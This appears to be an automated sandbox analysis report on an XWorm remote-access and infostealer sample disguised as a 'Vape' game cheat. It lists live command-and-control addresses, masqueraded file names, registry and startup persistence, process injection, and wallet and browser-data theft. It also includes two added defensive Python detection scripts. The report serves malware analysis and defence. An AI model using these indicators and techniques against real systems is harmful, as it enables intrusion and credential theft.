Analysis
- max time kernel: 149s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20240412-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 20-04-2024 12:38
- Static task: static1
- URLScan task: urlscan1
General
Malware Config
Extracted: xworm
C2:
- 185.216.70.22:7000
- 127.0.0.1:7000 (loopback address; not a usable network indicator)
- 185.239.237.162:7000
Install_directory: %AppData%
install_file: GoogleUpdateCore.exe
Signatures
-
Detect Xworm Payload 4 IoCs
resource | yara_rule
- C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe | family_xworm
- behavioral1/memory/5608-185-0x0000000000B80000-0x0000000000B98000-memory.dmp | family_xworm
- C:\Users\Admin\AppData\Roaming\discord.exe | family_xworm
- behavioral1/memory/5452-344-0x0000000000970000-0x000000000098E000-memory.dmp | family_xworm
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes: WAlletsd.exe, updater.exe
description | pid | process | target process
- PID 668 created 3444 | 668 | WAlletsd.exe | Explorer.EXE (6 entries)
- PID 6196 created 3444 | 6196 | updater.exe | Explorer.EXE (6 entries)
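The entries above read as PID 668 (WAlletsd.exe) and PID 6196 (updater.exe) each creating processes whose recorded parent is PID 3444 (Explorer.EXE): parent-PID spoofing, where the creator passes an explicit parent handle so that a process tree shows the child under Explorer. The following is an added example, not part of this report, of the detection logic a practitioner would run over process-start telemetry that records both the calling process and the declared parent (the ETW Microsoft-Windows-Kernel-Process ProcessStart event does this: the event header's ProcessID is the caller, the payload's ParentProcessID is the declared parent). The records are constructed from the report's PIDs; the child PIDs, child images, the svchost.exe record and the allowlist are assumptions.

```python
"""Flag parent-PID spoofing from process-start records.

Added example; not from the sandbox report. Each record carries the PID that
actually called the process-creation API (caller_pid) and the parent the new
process was given (parent_pid). For an ordinary creation they are equal; when
they differ the caller supplied an explicit parent, which is what the report's
"NtCreateUserProcessOtherParentProcess" signature describes.
"""
from collections import Counter
from typing import Dict, List, NamedTuple


class ProcessStart(NamedTuple):
    caller_pid: int       # who called NtCreateUserProcess (ETW header ProcessID)
    caller_image: str
    child_pid: int
    child_image: str
    parent_pid: int       # ParentProcessID recorded on the child
    parent_image: str


class Spoof(NamedTuple):
    child_pid: int
    child_image: str
    real_creator: str
    claimed_parent: str


# UAC elevation legitimately re-parents: the AppInfo service (hosted in
# svchost.exe) creates the elevated process with the requester as parent.
# Assumed allowlist; tune it against your own telemetry before relying on it.
LEGIT_REPARENTING_CALLERS = {"svchost.exe"}

# Constructed records. PIDs 668, 6196 and 3444 and their images come from the
# report; child PIDs/images and the svchost.exe record are assumptions.
EVENTS: List[ProcessStart] = [
    ProcessStart(668, "WAlletsd.exe", 6172, "sc.exe", 3444, "Explorer.EXE"),
    ProcessStart(6196, "updater.exe", 7120, "explorer.exe", 3444, "Explorer.EXE"),
    ProcessStart(3444, "Explorer.EXE", 3512, "msedge.exe", 3444, "Explorer.EXE"),
    ProcessStart(900, "svchost.exe", 5100, "mmc.exe", 3444, "Explorer.EXE"),
]


def find_ppid_spoofing(events: List[ProcessStart]) -> List[Spoof]:
    """Return creations where the caller is not the recorded parent.

    Records whose caller is a known legitimate re-parenting component are
    skipped so that UAC elevations do not drown the signal.
    """
    hits = []
    for e in events:
        if e.caller_pid == e.parent_pid:
            continue
        if e.caller_image.lower() in LEGIT_REPARENTING_CALLERS:
            continue
        hits.append(Spoof(e.child_pid, e.child_image, e.caller_image, e.parent_image))
    return hits


def count_by_creator(spoofs: List[Spoof]) -> Dict[str, int]:
    """Creator image -> number of spoofed children, for a triage summary."""
    return dict(Counter(s.real_creator for s in spoofs))


if __name__ == "__main__":
    for s in find_ppid_spoofing(EVENTS):
        print(f"{s.child_image} (pid {s.child_pid}) shows parent {s.claimed_parent} "
              f"but was created by {s.real_creator}")
```

Telemetry that records only the parent field (Sysmon Event ID 1, a plain process tree) cannot make this distinction on its own; the caller has to come from a source that attributes the creation event to the process that emitted it.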
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes: WAlletsd.exe, updater.exe
description | ioc | process
- File created | C:\Windows\System32\drivers\etc\hosts | WAlletsd.exe
- File created | C:\Windows\System32\drivers\etc\hosts | updater.exe
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: Vapev41.exe, VapeV4.exe, GoogleUpdateCore.exe, Vape Updated.exe, discord.exe
description | ioc | process
- Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | Vapev41.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | VapeV4.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | GoogleUpdateCore.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | Vape Updated.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | discord.exe
Drops startup file 2 IoCs
Processes: discord.exe
description | ioc | process
- File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk | discord.exe
- File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk | discord.exe
Executes dropped EXE 14 IoCs
pid | process
- 5728 | Vapev41.exe
- 5608 | GoogleUpdateCore.exe
- 1124 | VapeV4.exe
- 4556 | GoogleUpdateCore.exe
- 5372 | Vape Updated.exe
- 2672 | Vape.exe
- 5828 | Vape.exe
- 668 | WAlletsd.exe
- 5452 | discord.exe
- 1924 | bound.exe
- 6196 | updater.exe
- 3428 | rar.exe
- 5212 | GoogleUpdateCore.exe
- 2320 | discord.exe
Loads dropped DLL 17 IoCs
pid | process
- 5828 | Vape.exe (17 entries)
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX-packed files (yara_rule: upx)
All resources below matched yara_rule upx:
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\python311.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\libffi-8.dll
- behavioral1/memory/5828-342-0x00007FFB06160000-0x00007FFB0616F000-memory.dmp
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\_lzma.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\sqlite3.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\_sqlite3.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\_socket.pyd
- behavioral1/memory/5828-375-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmp
- behavioral1/memory/5828-374-0x00007FFAF15B0000-0x00007FFAF15D3000-memory.dmp
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\libssl-3.dll
- behavioral1/memory/5828-376-0x00007FFADECF0000-0x00007FFADF210000-memory.dmp
- behavioral1/memory/5828-378-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmp
- behavioral1/memory/5828-381-0x00007FFB06150000-0x00007FFB0615D000-memory.dmp
- behavioral1/memory/5828-380-0x00007FFAF1410000-0x00007FFAF1429000-memory.dmp
- behavioral1/memory/5828-384-0x00007FFAF12C0000-0x00007FFAF12D4000-memory.dmp
- behavioral1/memory/5828-385-0x00007FFB05FD0000-0x00007FFB05FDD000-memory.dmp
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\libcrypto-3.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\_ssl.pyd
- behavioral1/memory/5828-398-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmp
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\select.pyd
- behavioral1/memory/5828-366-0x00007FFAF1850000-0x00007FFAF1869000-memory.dmp
- behavioral1/memory/5828-363-0x00007FFAF1870000-0x00007FFAF189D000-memory.dmp
- behavioral1/memory/5828-360-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmp
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\_bz2.pyd
- behavioral1/memory/5828-338-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp
- behavioral1/memory/5828-434-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp
- behavioral1/memory/5828-484-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp
- behavioral1/memory/4916-498-0x00000274212D0000-0x00000274212E0000-memory.dmp
- C:\Users\Admin\AppData\Local\Temp\_MEI26722\_ctypes.pyd
- behavioral1/memory/5828-546-0x00007FFADECF0000-0x00007FFADF210000-memory.dmp
- behavioral1/memory/5828-320-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp
- behavioral1/memory/5828-561-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmp
- behavioral1/memory/5828-562-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmp
- behavioral1/memory/5828-610-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp
- behavioral1/memory/5828-637-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmp
- behavioral1/memory/5828-695-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp
- behavioral1/memory/5828-852-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp
- behavioral1/memory/5828-858-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmp
- behavioral1/memory/5828-853-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes: bound.exe, GoogleUpdateCore.exe, discord.exe
description | ioc | process
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | bound.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateCore = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdateCore.exe" | GoogleUpdateCore.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Roaming\\discord.exe" | discord.exe
-
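Two of the three Run-key entries above point at executables under %AppData%\Roaming, which a standard user can write to; the third is a RunOnce entry that calls a system DLL with a path under the user's Temp directory as its argument (wextract_cleanup* entries of this form are what IExpress self-extractors leave behind to delete their extraction directory). The following added example, not part of this report, parses "Set value" lines in the report's own format and applies that distinction as a triage heuristic. The sample lines are constructed to match the three entries listed above; the severity labels and the list of user-writable roots are assumptions.

```python
"""Triage autorun registry entries for images run from user-writable paths.

Added example; not part of the sandbox report. It parses "Set value" lines in
the report's own format and rates Run/RunOnce commands: "high" when the
executable itself lives under a directory a standard user can write to,
"low" when only an argument path does. Other registry writes are ignored.
"""
import re
from typing import List, NamedTuple

# Constructed sample lines matching the report's "Adds Run key" entries.
SAMPLE_LINES = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" bound.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateCore = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdateCore.exe" GoogleUpdateCore.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Roaming\\discord.exe" discord.exe',
]

_SET_VALUE = re.compile(r'^Set value \((?:str|int)\) (?P<key>.+?) = "(?P<value>.*)" (?P<proc>\S+)$')
_RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?$", re.IGNORECASE)
_WIN_PATH = re.compile(r'[A-Za-z]:\\[^"\s,]+')
# Roots a standard user can write to (assumed list; extend for your estate).
_USER_WRITABLE = re.compile(r"^[A-Za-z]:\\(?:Users\\|ProgramData\\|Windows\\Temp\\)", re.IGNORECASE)


class Autorun(NamedTuple):
    key: str
    value_name: str
    command: str
    process: str


class Finding(NamedTuple):
    value_name: str
    image: str
    severity: str
    reason: str
    process: str


def parse_set_value(line: str) -> Autorun:
    """Parse one report line; the report escapes backslashes and quotes inside the value."""
    m = _SET_VALUE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised line: {line!r}")
    key, value_name = m["key"].rsplit("\\", 1)
    command = re.sub(r"\\(.)", r"\1", m["value"])   # \\ -> \ and \" -> "
    return Autorun(key, value_name, command, m["proc"])


def split_command(command: str):
    """Return (image, arguments); the image may be quoted."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end], command[end + 1:]
    image, _, args = command.partition(" ")
    return image, args


def is_user_writable(path: str) -> bool:
    return bool(_USER_WRITABLE.match(path))


def triage_autoruns(lines: List[str]) -> List[Finding]:
    findings = []
    for line in lines:
        a = parse_set_value(line)
        if not _RUN_KEY.search(a.key):
            continue  # not a Run/RunOnce key
        image, args = split_command(a.command)
        if is_user_writable(image):
            findings.append(Finding(a.value_name, image, "high",
                                    "autorun image in user-writable directory", a.process))
        elif any(is_user_writable(p) for p in _WIN_PATH.findall(args)):
            # A system binary (here rundll32.exe with advpack.dll) pointed at a
            # user-writable path: worth a look, but also the IExpress cleanup pattern.
            findings.append(Finding(a.value_name, image, "low",
                                    "system binary with user-writable path in arguments", a.process))
    return findings


if __name__ == "__main__":
    for f in triage_autoruns(SAMPLE_LINES):
        print(f"[{f.severity}] {f.value_name}: {f.image} ({f.reason}; set by {f.process})")
```

The heuristic is a triage aid, not a verdict: per-user software does legitimately autorun from AppData, and the updater.exe this sample drops under C:\Program Files\Google\Chrome sits outside every user-writable root and would not be flagged here; that drop is covered by the report's separate "Drops file in Program Files directory" signature.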
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
- 112 | ip-api.com
- 119 | ip-api.com
Drops file in System32 directory 2 IoCs
Processes: powershell.exe
description | ioc | process
- File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
- File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
Suspicious use of SetThreadContext 2 IoCs
Processes: updater.exe
description | pid | process | target process
- PID 6196 set thread context of 1348 | 6196 | updater.exe | conhost.exe
- PID 6196 set thread context of 7120 | 6196 | updater.exe | explorer.exe
Drops file in Program Files directory 1 IoCs
Processes: WAlletsd.exe
description | ioc | process
- File created | C:\Program Files\Google\Chrome\updater.exe | WAlletsd.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | process
- 6172, 384, 4908, 2356, 5680, 6128, 7104, 220, 5388, 6576 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
- 5984, 6696, 6716, 5776 | schtasks.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid | process
- 2800, 5668, 2204 | tasklist.exe
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: msedge.exe
description | ioc | process
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 10 IoCs
pid | process
- 6732, 6112, 3332, 5772, 6616, 6212, 6960, 6172, 6592, 6264 | taskkill.exe
Modifies data under HKEY_USERS 46 IoCs
Processes: powershell.exe (all entries)
description | ioc
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
-
Modifies registry class 1 IoCs
Processes: msedge.exe
description | ioc | process
- Key created | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings | msedge.exe
NTFS ADS 1 IoCs
Processes: msedge.exe
description | ioc | process
- File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 235853.crdownload:SmartScreen | msedge.exe
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | process
- 5608 | GoogleUpdateCore.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | process (entries)
- 4984 | msedge.exe (2)
- 3512 | msedge.exe (2)
- 1716 | identity_helper.exe (2)
- 1388 | msedge.exe (2)
- 2316 | powershell.exe (3)
- 3652 | powershell.exe (3)
- 3584 | powershell.exe (4)
- 5292 | powershell.exe (4)
- 2832 | powershell.exe (4)
- 4916 | powershell.exe (4)
- 4944 | powershell.exe (3)
- 2764 | powershell.exe (3)
- 6464 | powershell.exe (3)
- 668 | WAlletsd.exe (12)
- 7140 | powershell.exe (3)
- 7024 | powershell.exe (3)
- 4572 | powershell.exe (3)
- 2480 | powershell.exe (3)
- 5164 | powershell.exe (1)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid | process
- 3512 | msedge.exe (11 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: GoogleUpdateCore.exe, powershell.exe, discord.exe, tasklist.exe, WMIC.exe, powercfg.exe
description | pid | process
- Token: SeDebugPrivilege | 5608 | GoogleUpdateCore.exe
- Token: SeDebugPrivilege | 4556 | GoogleUpdateCore.exe
- Token: SeDebugPrivilege | 2316 | powershell.exe
- Token: SeDebugPrivilege | 5452 | discord.exe
- Token: SeDebugPrivilege | 3652 | powershell.exe
- Token: SeDebugPrivilege | 3584 | powershell.exe
- Token: SeDebugPrivilege | 5292 | powershell.exe
- Token: SeDebugPrivilege | 2832 | powershell.exe
- Token: SeDebugPrivilege | 5668 | tasklist.exe
- Token: SeDebugPrivilege | 4916 | powershell.exe
- Token: SeDebugPrivilege | 2800 | tasklist.exe
- Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 3724 | WMIC.exe (21 entries)
- Token: SeDebugPrivilege | 2204 | tasklist.exe
- Token: SeDebugPrivilege | 4944 | powershell.exe
- Token: SeDebugPrivilege | 2764 | powershell.exe
- Token: (the same 21 tokens as above, in the same order) | 3724 | WMIC.exe (21 entries)
- Token: SeDebugPrivilege | 6464 | powershell.exe
- Token: SeDebugPrivilege | 7140 | powershell.exe
- Token: SeDebugPrivilege | 7024 | powershell.exe
- Token: SeDebugPrivilege | 4572 | powershell.exe
- Token: SeShutdownPrivilege | 5420 | powercfg.exe
- Token: SeCreatePagefilePrivilege | 5420 | powercfg.exe
- Token: SeShutdownPrivilege | 812 | powercfg.exe
- Token: SeCreatePagefilePrivilege | 812 | powercfg.exe
-
Suspicious use of FindShellTrayWindow 47 IoCs
pid | process
- 3512 | msedge.exe (47 entries)
Suspicious use of SendNotifyMessage 24 IoCs
pid | process
- 3512 | msedge.exe (24 entries)
Suspicious use of SetWindowsHookEx 1 IoCs
pid | process
- 5452 | discord.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes: msedge.exe
description | pid | process | target process
- PID 3512 wrote to memory of 2784 | 3512 | msedge.exe | msedge.exe (2 entries)
- PID 3512 wrote to memory of 4548 | 3512 | msedge.exe | msedge.exe (repeated)
- PID 3512 wrote to memory of 4984 | 3512 | msedge.exe | msedge.exe (2 entries)
- PID 3512 wrote to memory of 3116 | 3512 | msedge.exe | msedge.exe (repeated)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
[1] C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/js8e8K
      - Enumerates system info in registry
      - Modifies registry class
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb058246f8,0x7ffb05824708,0x7ffb05824718
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
